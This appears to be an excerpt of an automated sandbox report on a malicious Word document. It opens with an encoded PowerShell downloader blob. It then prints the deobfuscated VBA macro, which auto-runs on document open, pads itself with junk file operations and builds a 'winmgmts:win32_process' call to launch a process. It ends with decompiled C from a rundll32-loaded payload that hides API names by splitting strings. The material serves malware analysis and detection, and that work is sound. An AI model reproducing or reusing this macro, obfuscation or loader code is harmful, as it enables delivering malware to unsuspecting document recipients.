sAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgAJ
W5ya1q1z48ltq3z_
Open
Open
Open
Open
Open
Open
Open
Open
Open

Strings	Decrypted Strings
"dVMtDJ.ecCLuZ.vNWxUB"
"GmQlB.gLlkBCq.ohnmP"
"asHdBA.RNUGfJo.UEIiMmoM"
"fRHrGnFp.uWltAIHCI.WYWvIWr"
"qQeaRICAm.KgqZFRWRC.cuPrnUFxk"
"ShUECDIR.otrtDOGBA.OugaBFHlJ"
"umMOXxmA.SfYuGDN.ueONFAEFD"
"eIQhLAGS.forvJhMB.LGyFI"
"TifoEDtFB.fukVJAvIS.dlciFGDA"
""""
"myDIGCFHC.cgXWyuEFC.OybuGU"
"EnJMG.KCVSIHB.BJiWBGLWG"
"kfSFYoEHi.aXUIAvAP.dswKhikA"
"dfOYHJLF.uBXVkGE.ghpJGB"
"MTfEVUDIQ.DlrvrPEB.PgggwwMD"
"YHUtVQCI.AyvDaAH.JsZULCUu"
"eXoWdB.HSupDA.oXRxAS"
"nmuAl.yeRQHDs.UqyoFI"
"nzFmWEVE.ZFvEGsIFD.mjIMGVD"

Line	Instruction	Meta Information
2	Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
3	Goto GKsgQaAGE	executed
4	Dim NmmcJMB as String
5	Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154	Open
6	Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154	Open
7	Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154	Open
8	Put # 154, , NmmcJMB
9	Close # 154
9	GKsgQaAGE:
11	Goto fIjVkJj
12	Dim jFUMUmIIJ as String
13	Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146	Open
14	Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146	Open
15	Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146	Open
16	Put # 146, , jFUMUmIIJ
17	Close # 146
17	fIjVkJj:
19	Goto hTTQEJEAC
20	Dim OybSq as String
21	Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227	Open
22	Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227	Open
23	Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227	Open
24	Put # 227, , OybSq
25	Close # 227
25	hTTQEJEAC:
27	HBYVV = ""
28	S619csvpd1v4xzk5kc = HBYVV + VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)	Replace("wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)(Sqq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)(qq)(s2)(pqq)(s2)(qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)(","qq)(s2)(",) -> winmgmtS:win32_process W5ya1q1z48ltq3z_ executed
30	Goto mJsZBCEFo
31	Dim jUDsXM as String
32	Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131	Open
33	Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131	Open
34	Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131	Open
35	Put # 131, , jUDsXM
36	Close # 131
36	mJsZBCEFo:
38	Goto BOzmWI
39	Dim CJeaFB as String
40	Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124	Open
41	Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124	Open
42	Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124	Open
43	Put # 124, , CJeaFB
44	Close # 124
44	BOzmWI:
46	Goto kPMjtUB
47	Dim eVbTfoFi as String
48	Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149	Open
49	Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149	Open
50	Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149	Open
51	Put # 149, , eVbTfoFi
52	Close # 149
52	kPMjtUB:
54	End Function

Module: J7lmk7xauqcok9

Declaration

Line	Content
1	Attribute VB_Name = "J7lmk7xauqcok9"

Module: T6dwlv_ivpoiq2

Declaration

Line	Content
1	Attribute VB_Name = "T6dwlv_ivpoiq2"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 121, Strings: 0, Number of lines: 3, Relevance: 183.003

APIs	Meta Information
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Item
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Kfo_8qx2w7l7x71
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: ChrW
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Hvsf68urunanusc
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: wdKeyS
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: A08llnuiz59xyw7
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Pgjdd1yrw8qt
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: CreateObject
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Mid
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Len
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Create
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Gge416y0ol9ajq
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Z2vzndsnblr9xje7s
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open
Part of subcall function Tujor4m47ob@Dwztpwkmgv8q9o28r: Open

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Tujor4m47ob	executed
11	End Sub

Module: UserForm1

Declaration

Line	Content
1	Attribute VB_Name = "UserForm1"
2	Attribute VB_Base = "0{52A43B34-A9C8-4F96-A958-A43ACC1599CB}{AFB796FE-6EB6-46FD-8BFC-3D728DC178CD}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm2

Declaration

Line	Content
1	Attribute VB_Name = "UserForm2"
2	Attribute VB_Base = "0{2D23F958-D2D9-4832-928D-FB33041E5587}{825B89C9-94E3-46E3-BC0F-A2DC216A1D77}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm3

Declaration

Line	Content
1	Attribute VB_Name = "UserForm3"
2	Attribute VB_Base = "0{1F3E43FD-F8BE-4426-9384-C6A88D75F1C9}{D40BF70E-BE28-4285-9F4F-3488ADA6BC4B}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm4

Declaration

Line	Content
1	Attribute VB_Name = "UserForm4"
2	Attribute VB_Base = "0{6EB2EE04-13A3-4362-BA3F-59875CB1EF58}{9BBDA8EB-AD12-4F4D-93E8-0EF91D5DFAF4}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm5

Declaration

Line	Content
1	Attribute VB_Name = "UserForm5"
2	Attribute VB_Base = "0{F87A6A7A-77E7-4161-9232-75F50A9CDC8F}{EE80D04B-EC7B-4C25-B93D-02A7611C2194}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Reset < >

Analysis Process: powershell.exe PID: 2536 Parent PID: 2332 powershell.exeCOMMON

Executed Functions

Function 000007FF00243129, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2148419480.000007FF00240000.00000040.00000001.sdmp, Offset: 000007FF00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bf0a6cc8873c01020cc9ae81d07a2cc40e55fbe6a542a3efbf06725da87650
Instruction ID: 48b3692a0c16cf5a0fe431da8fd6ddbc56596c9fc1e22a3d14c6fb0ce8d8eb17
Opcode Fuzzy Hash: c1bf0a6cc8873c01020cc9ae81d07a2cc40e55fbe6a542a3efbf06725da87650
Instruction Fuzzy Hash: 8961572055EBC25FE7438B789C666A17FB0EF17200B1A04EBD489CF0B3DA585E59C762

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002408C0, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2148419480.000007FF00240000.00000040.00000001.sdmp, Offset: 000007FF00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0699b09e1de38af27e655d98b63a9609ffbea6466124573c04037429a9e35fc9
Instruction ID: e9fc145471cfa11c14c651dcdf7423eeb674e4d265be87d66ecd5d82fcea44b2
Opcode Fuzzy Hash: 0699b09e1de38af27e655d98b63a9609ffbea6466124573c04037429a9e35fc9
Instruction Fuzzy Hash: 6F41B06085E7C25FE74387389CA5A607FB0AF57211B1A04E7D585CF1B3DA28589AC722

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00242801, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2148419480.000007FF00240000.00000040.00000001.sdmp, Offset: 000007FF00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8606d54ad2fd4e8a5251946291d3d000e62a4683ae490537967d9a7c7287f1
Instruction ID: 5002ebbd5de4970cc5211eb50bb58f01b8c5e592a88bd42c3bc6fc3406533f7d
Opcode Fuzzy Hash: fc8606d54ad2fd4e8a5251946291d3d000e62a4683ae490537967d9a7c7287f1
Instruction Fuzzy Hash: BB11A26144E3C14FD30387385C656907FB0AF57204B5A05DBE489CF0F3E6595A69C723

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2908 Parent PID: 260 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 100031D0, Relevance: 1961.9, APIs: 1109, Strings: 10, Instructions: 3664
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E100031D0(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				char _v68;
				intOrPtr _v72;
				struct HWND__* _v76;
				char _v92;
				intOrPtr _v96;
				struct HWND__* _v100;
				char _v116;
				intOrPtr _v120;
				struct HWND__* _v124;
				char _v140;
				intOrPtr _v144;
				struct HWND__* _v148;
				char _v164;
				intOrPtr _v168;
				struct HWND__* _v172;
				char _v188;
				intOrPtr _v192;
				struct HWND__* _v196;
				char _v212;
				intOrPtr _v216;
				struct HWND__* _v220;
				char _v236;
				intOrPtr _v240;
				struct HWND__* _v244;
				char _v260;
				intOrPtr _v264;
				char _v284;
				void* _v285;
				long _v292;
				char _v296;
				struct HWND__* _v300;
				char _v304;
				void* __esi;
				signed int _t162;
				struct HINSTANCE__* _t174;
				CHAR* _t1291;
				signed int _t1301;
				void* _t1303;
				void* _t1309;
				intOrPtr* _t1310;
				void* _t1354;
				void* _t1355;
				struct HINSTANCE__* _t1356;
				void* _t1357;
				void* _t1358;
				void* _t1365;
				void* _t1366;
				signed int _t1367;
				void* _t1368;
				void* _t1370;
				void* _t1373;
				void* _t1374;
				void* _t1377;
				void* _t1380;

				_t1380 = __eflags;
				_t1355 = __edi;
				_t1354 = __edx;
				_t1340 = __ebx;
				_t162 =  *0x10026250; // 0x93b758c1
				_v8 = _t162 ^ _t1367;
				_v300 = 0;
				_v292 = 0;
				_v20 = 0x17;
				_v16 = 0x1e55;
				_v12 = 0x409;
				_v240 = 0xf;
				_v244 = 0;
				_v260 = 0;
				E10001540(__ebx,  &_v260, __edi, "Ldr", 3);
				_v96 = 0xf;
				_v100 = 0;
				_v116 = 0;
				E10001540(__ebx,  &_v116, __edi, "Acces", 5);
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E10001540(__ebx,  &_v92, __edi, "sResource", 9);
				E10001C50(_t1340,  &_v92, _t1380,  &_v212, E10001CD0( &_v236,  &_v260,  &_v116),  &_v92);
				_t1370 = _t1368 + 0x18;
				_t1381 = _v216 - 0x10;
				if(_v216 >= 0x10) {
					L100077B5(_v236);
					_t1370 = _t1370 + 4;
				}
				_push(_t1355);
				_t174 = LoadLibraryA("ntdll.dll");
				_v48 = 0xf;
				_t1356 = _t174;
				_v52 = 0;
				_v68 = 0;
				E10001540(_t1340,  &_v68, _t1356, "LdrF", 4);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E10001540(_t1340,  &_v44, _t1356, "ind", 3);
				_v144 = 0xf;
				_v148 = 0;
				_v164 = 0;
				E10001540(_t1340,  &_v164, _t1356, "Resour", 6);
				_t1347 =  &_v140;
				_v120 = 0xf;
				_v124 = 0;
				_v140 = 0;
				E10001540(_t1340,  &_v140, _t1356, "ce_U", 4);
				E10001C50(_t1340,  &_v140, _t1381,  &_v188, E10001C50(_t1340,  &_v140, _t1381,  &_v236, E10001CD0( &_v284,  &_v68,  &_v44),  &_v164),  &_v140);
				_t1373 = _t1370 + 0x24;
				if(_v216 >= 0x10) {
					L100077B5(_v236);
					_t1373 = _t1373 + 4;
				}
				_v216 = 0xf;
				_v220 = 0;
				_v236 = 0;
				if(_v264 >= 0x10) {
					L100077B5(_v284);
					_t1373 = _t1373 + 4;
				}
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
